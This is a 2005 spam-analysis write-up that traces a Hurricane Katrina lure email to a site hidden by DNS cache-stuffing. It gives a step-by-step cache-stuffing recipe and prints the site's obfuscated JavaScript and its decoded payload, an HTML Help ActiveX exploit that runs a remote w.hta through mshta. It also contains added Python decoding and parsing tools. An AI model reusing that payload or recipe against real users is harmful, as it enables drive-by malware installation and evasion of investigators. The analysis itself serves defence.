Spam analysis: example #9
DNS cache-stuffing; encrypted WinXP “Trojan Dropper”

There’s nothing particularly novel about this message on its face; things get VERY interesting, however, once you start to track down the cracker’s website(s). This seems to have been a very well-deployed effort (using elaborate DNS trickery) to use a little “human engineering” to implant suspicious files on vulnerable, unpatched versions of Microsoft Windows. First things first, however:

From address hidden Thu Sep 1 19:27:25 2005
Received: from elyo.fr ([172.18.12.133])
   by vms045.mailsrvcs.net
   (Sun Java System Messaging Server 6.2-2.05
   (built Apr 28 2005))
   with ESMTP id <0IM500H0K6LK0U80@vms045.mailsrvcs.net>
   for address hidden ;
   Thu, 01 Sep 2005 09:22:33 -0500 (CDT)
Received: from elyo.fr (201.27.212.22)
   by sv13pub.verizon.net
   (MailPass SMTP server v1.2.0 - 080905135255JY+PrW)
   with SMTP id <2-21369-167-21369-45779-1-1125584550> for
   vms045pub.verizon.net; Thu, 01 Sep 2005 09:22:32 -0500
Received: from [192.168.48.76] (helo=mangrove)
   by elyo.fr with smtp (Descant kp 5.32 (Selfless))
   id ozKkED-MYhgNO-MR for address hidden ; Thu,
   01 Sep 2005 09:22:09 -0500
Date: Thu, 01 Sep 2005 09:22:05 -0500
From: "Dayton Hiltz" address hidden
Subject: Re: j3 Tropical storm flooded New Orleans,
X-Originating-IP: [201.27.212.22]
To: "Philippa Hairston" address hidden
Reply-to: "Dayton Hiltz" address hidden
Message-id: <005e01c5af00$87046480$4c30a8c0@mangrove>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
Content-type: multipart/alternative;
boundary="----=_NextPart_000_005B_01C5AED6.9E2E5C80"
X-Priority: 3
X-MSMail-priority: Normal



This is a multi-part message in MIME format.

------=_NextPart_000_005B_01C5AED6.9E2E5C80
Content-Type: text/plain;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Theres the whole explanation for you! Berlioz thought in pump, which they =
stamped on the carpet with a preoccupied air. to fetch water in the gully =
below the hill, where in the thin shade of appeared. Catch him immediately, =
otherwise hell do untold harm! The professor does not know what draws him to =
the fence or who lives in No, excuse me! The exposure is absolutely =
necessary. Without it your of the truck and raised his arm, for some reason =
attacking the cast-iron man The artiste clasped his hands. all. The moment =
Ace of Diamonds ran into the findirectors office, he one of the =
investigators. The barman became as if welded to his tabouret. I, I, =
whispered the cat, I give the signal! Right. Of course. Absolutely. Urgently. =
Without fail. Ill tell Therefore she started doing whatever came along. She =
smashed pots of whispered. He just doesnt want to! He doesnt like hotels! Ive =
had them at his desk, facing the summer garden of the Variety, where there =
were

------=_NextPart_000_005B_01C5AED6.9E2E5C80
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; charset=3Dus-ascii">
<META content=3D"MSHTML 6.00.2800.1106" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial>&nbsp;Just before daybreak Tuesday, Katrina, now a =
tropical storm, was 35 miles<BR>northeast of Tupelo, Miss., moving =
north-northeast with winds of 50 mph. <BR>Forecasters at the National =
Hurricane Center said the amount of rainfall <BR>has been adjusted downward =
Monday. </FONT></DIV>
<DIV><FONT face=3DArial></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial>&nbsp;Mississippi Gov. Haley Barbour said Tuesday =
that Hurricane Katrina killed <BR>as many as 80 people in his state and burst =
levees in Louisiana flooded New <BR>Orleans.</FONT></DIV>
<DIV><FONT face=3DArial></FONT>&nbsp;</DIV>
<DIV><FONT face=3DArial><A href=3D"http://nextermest.com">Read =
More..<BR></A></DIV></FONT></BODY></HTML>

------=_NextPart_000_005B_01C5AED6.9E2E5C80--


Just to get the boring stuff out of the way: the message was dropped off by 201.27.212.22, a Brazilian host; it was misidentified as elyo.fr (yet another case of a domain name being used as a false HELO). This handoff is shown in the second Received line, by the way; the first line looks to be an internal relay within Verizon (my ISP). The body has two MIME parts: a text/plain part (that few recipients will see in their mail programs) containing a lot of neutral text to help the message through Bayesian filters, and a text/html part that contains the actual payload. Not terribly remarkable as spams go these days.
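The Received-chain reading just described (skip the internal relay, find the hop where the message arrived from a public address, treat the HELO name as untrusted) can be done mechanically. The following is an added example written for this write-up, not the author's code; it unfolds the headers reproduced above, copied verbatim, and assumes the common "from NAME (IP) by HOST" layout of Received lines.

```python
"""Walk a message's Received chain to find where it entered from the
public Internet. Added example for this write-up, not the author's code.
The header text is the chain reproduced above; the hop parser assumes
the common 'from NAME (IP) by HOST' layout."""
import ipaddress
import re

# Received headers of the analysed message, folded as in the original.
RAW_HEADERS = """\
Received: from elyo.fr ([172.18.12.133])
   by vms045.mailsrvcs.net
   (Sun Java System Messaging Server 6.2-2.05
   (built Apr 28 2005))
   with ESMTP id <0IM500H0K6LK0U80@vms045.mailsrvcs.net>
   for address hidden ;
   Thu, 01 Sep 2005 09:22:33 -0500 (CDT)
Received: from elyo.fr (201.27.212.22)
   by sv13pub.verizon.net
   (MailPass SMTP server v1.2.0 - 080905135255JY+PrW)
   with SMTP id <2-21369-167-21369-45779-1-1125584550> for
   vms045pub.verizon.net; Thu, 01 Sep 2005 09:22:32 -0500
Received: from [192.168.48.76] (helo=mangrove)
   by elyo.fr with smtp (Descant kp 5.32 (Selfless))
   id ozKkED-MYhgNO-MR for address hidden ; Thu,
   01 Sep 2005 09:22:09 -0500
X-Originating-IP: [201.27.212.22]
"""

# 'from <claimed name> <anything> by <receiving host>'
HOP_RE = re.compile(r"^Received:\s+from\s+(\S+)\s+(.*?)\bby\s+(\S+)", re.I)
IP_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def unfold(raw):
    """Join folded header lines: a line starting with whitespace continues
    the previous header (RFC 2822 folding)."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def hops(raw):
    """Received hops newest-first as (claimed name, sender IP, receiver).
    The claimed name is whatever the sender said in HELO and can be
    anything; only the IP is recorded by the receiving server."""
    result = []
    for line in unfold(raw):
        m = HOP_RE.match(line)
        if m:
            claimed, extra, receiver = m.groups()
            ip = IP_RE.search(claimed + " " + extra)
            result.append((claimed.strip("[]"), ip.group(0) if ip else None, receiver))
    return result


def origin_hop(raw):
    """First hop (newest-first) whose sender is a public address: the
    point where the message was handed into the receiving network.
    Private (RFC 1918) senders are internal relays and are skipped."""
    for claimed, ip, receiver in hops(raw):
        if ip and not ipaddress.ip_address(ip).is_private:
            return claimed, ip, receiver
    return None


def x_originating_ip(raw):
    """Value of the X-Originating-IP header, if the MTA added one."""
    for line in unfold(raw):
        if line.lower().startswith("x-originating-ip:"):
            m = IP_RE.search(line)
            return m.group(0) if m else None
    return None


if __name__ == "__main__":
    for claimed, ip, receiver in hops(RAW_HEADERS):
        print(f"{receiver} got it from {ip} (claimed {claimed})")
    origin = origin_hop(RAW_HEADERS)
    print("origin:", origin)
    print("X-Originating-IP agrees:", origin[1] == x_originating_ip(RAW_HEADERS))
```

Run against the chain above it reports the Verizon internal relay (172.18.x, skipped), then 201.27.212.22 handing the message to sv13pub.verizon.net while claiming to be elyo.fr, which is the handoff the analysis identifies; the lowest Received line, with a 192.168.x sender, is whatever the sending side wrote and cannot be verified from here.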

The payload message refers to the tragedy of Hurricane Katrina, which was fresh on everyone’s minds at the time, and so the message was well calibrated to get a lot of people to follow the offered website link to nextermest.com (the “Read More..” link in the HTML part).

What comes next involves not so much the spam, but the website to which it points. I freely admit to not being a particular expert in DNS, Windows Trojans, or related matters, and a lot of what I will say here is pretty speculative. Perhaps, however, someone may be able to pick up the ball and run with it.

Stuffing the cache

So, what is nextermest.com? That’s a good question that I’ll tackle later on, but first we might want to ask, “Where is (or was) nextermest.com?” As I began to research this site for a spam report, my whois lookup tracked it to a Canadian IP address. However, SpamCop had other ideas and tracked it to a completely different IP. This seemed odd, so I availed myself of the “ISP cached DNS lookup tool” provided by http://www.DNSstuff.com/ and found something fairly surprising: depending upon whose name server you used, nextermest.com could have been found at any of the following six IP addresses:

Address          Provider (net block)
24.164.104.124   Roadrunner (rr.com), USA (ROAD-RUNNER-5 net block)
201.150.68.7     Cablemas Juarez, Mexico (MX-CAJU-LACNIC)
24.131.98.37     Comcast (comcast.net), USA (PENNSYLVANIA-5 net block)
61.52.228.192    CNC Group Henan province network, China (CNCGROU-HA net block)
216.55.194.126   MyManitoba.com (mts.net), Canada (BRND-RES-DSL-1-MB-CA net block)

What’s this? How can one host name resolve to any of six (or more) different IP addresses at the same time? It’s easy if you know the trick — a trick that I call “stuffing the cache.”

The domain name service (DNS) is the service that gives you a numeric IP address when you give it a host name. Every time you load a website or send out an e-mail (or perform just about any other internet-related task), your computer is making one or more requests, or “queries,” to find out the IP address associated with the name (this is called “resolving the name” in DNS parlance).

Normally, your computer talks to a DNS host or “name server” in your own domain; this name server then goes out to a hierarchy of other (external) name servers, eventually finding the one that knows where the host name you want can be found on the IP network (this name server is called the “authoritative” name server for the domain in question).

Consider now what happens with a large ISP that has thousands of customers; at any given time, large numbers of them will probably be looking things up on Google. This would normally result in a huge number of repetitive lookups for www.google.com; this is inefficient and wasteful of bandwidth.

For this reason, most name servers will “cache” (temporarily store) popular name lookups so that they don’t have to traverse the DNS hierarchy for each and every lookup. For example, when you ask for “www.google.com,” your provider’s name server will simply give you its cached answer instead of running another top-down DNS query to external DNS hosts. This is good, because it gives you faster response, and also keeps the provider from clogging its backbone bandwidth with a zillion redundant full top-down lookups for Google.

Because host names and IP numbers are constantly changing, however, we can’t hang onto cache entries forever; these are therefore stamped with a “time-to-live” (TTL), after which they expire and must be “refreshed” with a full lookup. Usually, the TTL is on the order of a few hours or a couple of days. This is one of the reasons why DNS changes can sometimes take a few hours or days to fully propagate around the world.

Just what is the point of all this discussion? The point is that name server caching can provide spammers with an excellent means to hide their websites “in plain sight” as it were. Suppose you have set up a spam website, and you want to deflect spam investigators from finding out where it is hosted. This is what you do:

  1. Buy a domain name for the site (e.g., “phony.foo”).
  2. Set up your own DNS servers to be the “authoritative” name servers for “phony.foo” (or, contract with crooked DNS-only providers who specialize in spam support).
  3. Log on to an assortment of your favorite large ISPs (AOL, Verizon, Comcast, etc.) and make repeated DNS requests for “phony.foo.” Eventually, you will get your site cached by these providers’ name servers.
  4. Now, disable your authoritative name servers so that it is no longer possible to do a top-down name lookup for “phony.foo.”

Congratulations; you’ve ensured full access to your site (at least for as long as the TTL of your cache entries), while at the same time you’ve confused or stymied inexperienced spam investigators. This is the typical sort of cache-stuffing that one occasionally finds in normal spam these days.

The folks behind nextermest.com took the basic cache-stuffing concept several steps further: they set up six (or at least six) different websites; then, they selectively stuffed the caches of various providers with one or another of these. In this way, a user looking up nextermest.com would get different answers depending upon whose name server he used.

But how (the educated reader may ask) could one authoritative name server give six completely different answers to where nextermest.com is? Let’s turn to the useful tool dig to find out exactly what the authoritative name servers were for nextermest.com.

[G4733:~] rconner% dig nextermest.com

; <<>> DiG 9.2.2 <<>> nextermest.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8901
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;nextermest.com. IN A

;; ANSWER SECTION:
nextermest.com. 3782 IN A 24.164.104.124

;; AUTHORITY SECTION:
nextermest.com. 3207 IN NS ns1.nextermest.com.
nextermest.com. 3207 IN NS ns2.nextermest.com.

;; ADDITIONAL SECTION:
ns1.nextermest.com. 3207 IN A 24.164.104.124
ns2.nextermest.com. 3207 IN A 24.164.104.124

;; Query time: 133 msec
;; SERVER: 199.45.32.38#53(199.45.32.38)
;; WHEN: Thu Sep 1 19:52:01 2005
;; MSG SIZE rcvd: 116

Here, dig has told us the IP address that it has for nextermest.com (ANSWER section), and also the host names (AUTHORITY section) and IP addresses (ADDITIONAL section) of the two name servers that are listed as “authoritative” for the domain. But—wait a minute—the two name servers ns1.nextermest.com and ns2.nextermest.com are not only both at the same address, they’re at the same address as the website nextermest.com itself! (The mts.net address in this particular case).

You begin to get a clue to what’s going on when you look at the addresses given above: at least three of the six are clearly DSL (or cable modem) subscriber lines — probably used by the machines of home users. So, it looks as though we have some particularly intelligent open proxies or “zombies” at work here — not only do they have their own web servers, they also have their own vestigial DNS hosts as well. I’m not enough of a DNS expert to know how the perps could get six different addresses into circulation for their bogus name servers (perhaps cache-stuffing works here too), but clearly there’s some gross abuse of DNS going on here.
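The checks used in this section (comparing what different providers’ caches hand out for the name, reading the remaining TTL off a cached answer, and noticing that the glue records for the “authoritative” name servers point at the web site’s own address) can be scripted. The following is an added example written for this page, not the author’s code and not a DNSstuff tool: it parses the dig output shown above and runs the comparison over a table constructed from the addresses listed earlier. The resolver labels in that table are assumptions; in practice you would fill it from a query against each provider’s own name server.

```python
"""Investigator tooling for the DNS checks described on the page.
Added example, not code from the original write-up. DIG_OUTPUT is the
page's own dig answer; CACHED_ANSWERS is constructed from the addresses
the page lists, with assumed resolver labels."""
import re
from collections import defaultdict

# The dig output reproduced on the page (answer, authority and glue sections).
DIG_OUTPUT = """
;; QUESTION SECTION:
;nextermest.com. IN A

;; ANSWER SECTION:
nextermest.com. 3782 IN A 24.164.104.124

;; AUTHORITY SECTION:
nextermest.com. 3207 IN NS ns1.nextermest.com.
nextermest.com. 3207 IN NS ns2.nextermest.com.

;; ADDITIONAL SECTION:
ns1.nextermest.com. 3207 IN A 24.164.104.124
ns2.nextermest.com. 3207 IN A 24.164.104.124
"""

# Constructed table: which A record each provider's cache handed out.
# Addresses are from the page; the resolver labels are assumptions.
CACHED_ANSWERS = {
    "Roadrunner (USA)": "24.164.104.124",
    "Cablemas Juarez (Mexico)": "201.150.68.7",
    "Comcast (USA)": "24.131.98.37",
    "CNC Group Henan (China)": "61.52.228.192",
    "MyManitoba.com (Canada)": "216.55.194.126",
}

SECTION_RE = re.compile(r"^;; (\w+) SECTION:$")
# name, TTL, class, type, rdata; dig separates the fields with tabs or spaces
RR_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(A|NS)\s+(\S+)$")


def parse_dig(text):
    """Group the A and NS records of a dig answer by section name."""
    sections = defaultdict(list)
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = RR_RE.match(line)
        if m and current and current != "QUESTION":
            name, ttl, rtype, rdata = m.groups()
            sections[current].append(
                (name.lower().rstrip("."), int(ttl), rtype, rdata.lower().rstrip("."))
            )
    return dict(sections)


def cached_ttl_seconds(parsed):
    """Smallest remaining TTL in the ANSWER section: how long this resolver
    will keep handing out the entry without asking anyone else."""
    return min(ttl for _, ttl, _, _ in parsed["ANSWER"])


def self_hosted_nameservers(parsed):
    """Addresses that appear both as the zone's A record and as glue for
    its own NS hosts. A non-empty result means the 'authoritative' name
    servers live at the same address as the web site, the pattern the
    page observed for nextermest.com."""
    site = {rdata for _, _, rtype, rdata in parsed.get("ANSWER", []) if rtype == "A"}
    ns_hosts = {rdata for _, _, rtype, rdata in parsed.get("AUTHORITY", []) if rtype == "NS"}
    glue = {rdata for name, _, rtype, rdata in parsed.get("ADDITIONAL", [])
            if rtype == "A" and name in ns_hosts}
    return site & glue


def answers_by_address(cached):
    """Invert a resolver->address table so each address lists the resolvers
    that served it. More than one key means the caches disagree."""
    by_addr = defaultdict(list)
    for resolver, addr in cached.items():
        by_addr[addr].append(resolver)
    return {addr: sorted(who) for addr, who in by_addr.items()}


def caches_disagree(cached):
    return len(answers_by_address(cached)) > 1


if __name__ == "__main__":
    parsed = parse_dig(DIG_OUTPUT)
    print("remaining TTL (min):", cached_ttl_seconds(parsed) // 60)
    print("NS glue shared with the site:", self_hosted_nameservers(parsed))
    for addr, who in answers_by_address(CACHED_ANSWERS).items():
        print(addr, "<-", ", ".join(who))
    print("caches disagree:", caches_disagree(CACHED_ANSWERS))
```

On the page’s own dig answer this reports about 63 minutes of remaining cache life and flags 24.164.104.124 as both the site and the glue for ns1/ns2; on the constructed table it reports five different answers for one name, which is what a stuffed cache looks like from the outside.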

As we entered the Labor Day weekend, nextermest.com’s presence on the network went down dramatically. First, the websites disappeared (nextermest.com at port 80), followed by the name servers (nextermest.com at port 53), until by Monday it was still possible to resolve the name servers to 222.135.42.216 (yet another Chinese CNC-Group address), but they no longer responded to pings.

It would be nice to think that these sites were shut down through the fast response of the abuse staffs and NOCs at the affected providers; however, it is more likely that the sites were scheduled to shut down automatically, or may have been shut down remotely by the perpetrators after they had accomplished their objectives, and before investigators could get onto their trail.

The domain

Can we learn anything by looking up the domain registry info for nextermest.com? I dunno, let’s try:

[G4733:~] rconner% whois -h whois.joker.com nextermest.com
domain: nextermest.com
owner: david ahn
email: dcorbins@yahoo.com
address: 350 s. grand ave. suite 200
city: Los Angeles
state: ca
postal-code: 90071
country: US
phone: +1 9284411897
admin-c: dcorbins@yahoo.com#5
tech-c: dcorbins@yahoo.com#5
billing-c: domainz@web2mail.com#0
reseller: Registered through Your-Domains-Here.com
reseller: Your first offshore domain registar
reseller: Belize,Belize City,99 Albert Street
reseller: Forward abuses to abuse@your-domains-here.com
nserver: ns1.nextermest.com 222.135.42.216
nserver: ns2.nextermest.com 222.135.42.216
status: lock
created: 2005-08-24 17:17:42 UTC
modified: 2005-08-28 12:47:39 UTC
expires: 2006-08-24 13:17:41 UTC
source: joker.com live whois service
query-time: 0.069384
db-updated: 2005-09-03 01:08:20

Note that I went straight to whois.joker.com for this lookup, because an earlier “default” whois lookup (“whois nextermest.com”) told me that the info would be found there.

The domain was registered on August 24th (very soon before the mails went out) with an outfit known as “Your-Domains-Here.com” based in Belize. One suspects that the slogan “Your first offshore domain registrar” may be a codeword of some sort; this outfit was prominently featured as the seller of numerous spam domains at the time the nextermest.com message appeared.

It’s hard for me to make much out of the rest of the registration data. The name “David Ahn” did not turn up much in a Google search. I have no particular way to check up on the Yahoo mail address, other than by sending mail to it (which I’m not particularly interested in doing). The street address could be mapped by Yahoo Maps and had the correct zip code. A reverse lookup on the phone number provided no listing, but did indicate that the area code and exchange are from Prescott, Arizona rather than Los Angeles (if this happened to be a cell phone number, then it would not be uncommon for it to have been “transferred” to LA from Arizona by its owner). The same phone number appeared in the registration data for at least one other more conventional spam domain, which suggests that a spam gang is at work here.

The exploit

So, why go to what was obviously a hell of a lot of trouble (much more than the typical spammer would tolerate) to get these six sites up and running just for the duration of the TTL window? For the answer to that, I went (with trepidation) to the nextermest.com site.

The website looked harmless enough, just a string of random “news stories” (leading off with the Katrina story), plus an “advertisement” for anti-virus software. However, this is the HTML source of what you saw on the screen:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head><title>Katrina killed as many as 80 people.
</title></head>
<body style="font-family: Tahoma; font-size: 14px;">
<script>
var hr=location.href,st='',k='',s='',b='cgabbfbbgbcbbaibabcgccdf
bcacfaceecdfbcacfbbcdbbcbbbbbfbafbbgbafbbbbbacficjhcjibbfbbbbaib
bhbbgbabcfjbaibabbacbbgcficefcejceiceiceicfjbcfcgacehbbfbbgbcbba

(NUMEROUS LINES OF SIMILAR GIBBERISH SNIPPED)

fjcdjceecejceiceiceicebcfjbbfbabbbgciebafbajbabbbbbbhbbgceacdjbb
jbafbbabaabbbbbjcegcjjbaibbbbbfbabceacebcfjcdjceecejcfaceiceiceb
cfjcgacehbbfcjjbbebafbbcbbgcgc';
for(i=0;i<b.length;i++){
s+=b.slice(i,i+1).charCodeAt(0)-97;};
for(j=0;j<String(s).length;j+=3){
k=parseInt(String(s).slice(j,j+3));
if(k>200){k-=200;}
st+=String.fromCharCode(k);};
document.write(st.replace('%',hr.substring(0,hr.lastIndexOf('/')) +'/w.hta'));
</script>
<table align=center cellpadding="5">
<tr><td>
<table align=center width="650" style="border: solid #cccccc 1pt;" cellpadding="15"><tr><td>
<div style="font-size:28px;" align=center>Katrina killed as many as 80 people.
</div><br>
<table align="right" border="0" cellpadding="0" cellspacing="0" width="203">
<tbody><tr><td>
<div>
<img alt="" src="img/nvvzbui4.jpg
" border="1" hspace="0" vspace="0" width="203">
</div>
</td></tr>
</tbody></table><b>NEW ORLEANS, United States (UPI) -- Mississippi Gov. Haley Barbour said Tuesday that Hurricane Katrina killed as many as 80 people in his state and burst levees in Louisiana flooded New Orleans.
</b><p>Just before daybreak Tuesday, Katrina, now a tropical storm, was 35 miles northeast of Tupelo, Miss., moving north-northeast with winds of 50 mph. Forecasters at the National Hurricane Center said the amount of rainfall has been adjusted downward Monday.
</p><p>Thirty storm-related deaths in Mississippi`s Harrison County were at an apartment complex, near the beach in Biloxi, Kelly Jakubic with the county`s Emergency Operations Center told CNN.
</p><p>Louisiana Gov. Kathleen Babineaux Blanco said there was no official death tally in Louisiana, but said she expected that to change.

(REMAINDER SNIPPED)

This is a straightforward HTML page, but it has a very odd-looking encrypted JavaScript at the top. Looks like another job for our old code-breaking hack, the OmniWeb alert box trick; I changed the document.write statement at the end of the script to an alert statement, and then reloaded the page. This is how the script got decoded (I changed the line breaks for readability):

<style>#x2,#x3{position:absolute;left:-1000;}</style>
<OBJECT id=x2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<param name="Scrollbars" value="true">
<PARAM NAME="Item1" VALUE="command;ms-its:icwdial.chm::/icw_overview.htm">
</OBJECT>
<script>
x2.HHClick();
window.opener.focus();
</script>
<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<PARAM NAME="Item1" VALUE=
   "command;javascript:document.links[0].href
      ='EXEC=,mshta,file:/Users/rconner/Desktop/w.hta      CHM=ieshared.chm      FILE=app_install.htm'3document.links[0].click();">
</OBJECT>
<script>
setTimeout('x3.HHClick();',1000);
setTimeout('window.close();',1200);
</script>
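Running the page’s own decoding loop outside a browser is the safer way to read a script like this. The following Python is an added example, not code from the original page or its author; it reproduces the three steps of the script above (letter to digit, three digits to a character code, then the first “%” replaced by the page directory plus “/w.hta”). Its input is the first 150 letters of the encoded string shown above, which is all the write-up reproduces; the page URL is a made-up stand-in for location.href, and the short second sample was hand-encoded with the same scheme so the “%” substitution has something to act on.

```python
"""Offline re-implementation of the decoding loop in the nextermest.com
script. Added example, not code from the original page or its author.
Inputs: the first 150 letters of the page's encoded string (the rest was
snipped in the write-up) and a made-up page URL standing in for
location.href. Encoded input is expected to use only the letters a..j."""

# First three lines of the page's string 'b', joined, cut to a whole
# number of 3-letter groups.
ENCODED_PREFIX = (
    "cgabbfbbgbcbbaibabcgccdf"
    "bcacfaceecdfbcacfbbcdbbcbbbbbfbafbbgbafbbbbbacficjhcjibbfbbbbaib"
    "bhbbgbabcfjbaibabbacbbgcficefcejceiceiceicfjbcfcgacehbbfbbgbcb"
)

# Constructed by hand with the same scheme: decodes to 'a=%;' so the
# final '%' substitution can be seen.
ENCODED_WITH_PLACEHOLDER = "cjhcgbcdhcfj"


def letters_to_digits(encoded):
    """Step 1 of the script: s += charCodeAt(i) - 97, so 'a'..'j' -> '0'..'9'."""
    return "".join(str(ord(ch) - 97) for ch in encoded)


def digits_to_text(digits):
    """Step 2: parseInt of each 3-digit group; values over 200 had 200
    added (every group then starts with a non-zero digit) and are reduced
    before String.fromCharCode."""
    out = []
    for j in range(0, len(digits), 3):
        code = int(digits[j:j + 3])  # a short final group parses as parseInt would
        if code > 200:
            code -= 200
        out.append(chr(code))
    return "".join(out)


def decode_payload(encoded, page_url):
    """Step 3: the document.write line replaces the first '%' with the
    directory of the current page plus '/w.hta' (String.replace with a
    string pattern changes only the first match)."""
    text = digits_to_text(letters_to_digits(encoded))
    base = page_url[:page_url.rfind("/")]
    return text.replace("%", base + "/w.hta", 1)


if __name__ == "__main__":
    url = "http://example.invalid/news/index.html"  # stand-in for location.href
    print(decode_payload(ENCODED_PREFIX, url))
    print(decode_payload(ENCODED_WITH_PLACEHOLDER, url))
```

The 150-letter prefix decodes to the opening of the listing above, up to and including “</sty”; the rest cannot be recovered because the page snipped it. The +200 offset on codes below 100 keeps every group free of a leading zero, which I read as a guard against parseInt treating a “0nn” group as octal in browsers of that era.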

I direct your attention in particular to the Item1 parameter of the second OBJECT (x3): I don’t speak Microsoft-ese, but this bit seems to be an attempt to load a page called “app_install.htm,” and then get a file called “w.hta” onto my system and execute it (the attempt did not work, probably because I’m a Mac user). I googled the term “hta file” and found the following chilling information (emphasis added):

So, there you are. Thank you so bloody much, Microsoft, for another confusing, redundant, and irrelevant “enhancement” to your porous and substandard operating systems, a “feature” that can be turned into a criminal weapon. Thanks to HTA, crackers can completely fsck up innocent users’ machines at will “...without annoying alerts and warnings.”

In the days that followed, security reports and blogs began to show up on Google describing the nature of the nextermest.com attack. Apparently, it now has a name: Trojan-downloader.JS.Small.bq. Its basic mission, as the name implies, is to use JavaScript to download a “trojan horse” file to vulnerable computers; it is hard to say exactly what the perps intended without a live example of the actual file downloaded, but I’d say the chances were very good that the perps were “recruiting” a fresh supply of open proxy machines for sending spam mail. The amount of expense and trouble associated with this gag is simply too much for simple “script kiddy” sociopathy.

A bit more research suggested that this exploit was derived from one posted on the web in late 2004 as a “proof of concept” for a Windows remote command execution exploit. The publishers of that POC appear to have meant well in the effort to draw attention to a major security hole (affecting some versions of Windows XP and Windows Server 2003), but in so doing they may have made it a bit too easy for bad guys to copy and paste the nasty stuff into their own exploits.

Here’s another link, this one from spywareinfo.com, describing HTA exploits in further detail. Consider yourself warned.


(c) 2003-2006, Richard C. Conner ( )


Updated: Sat, 06 May 2006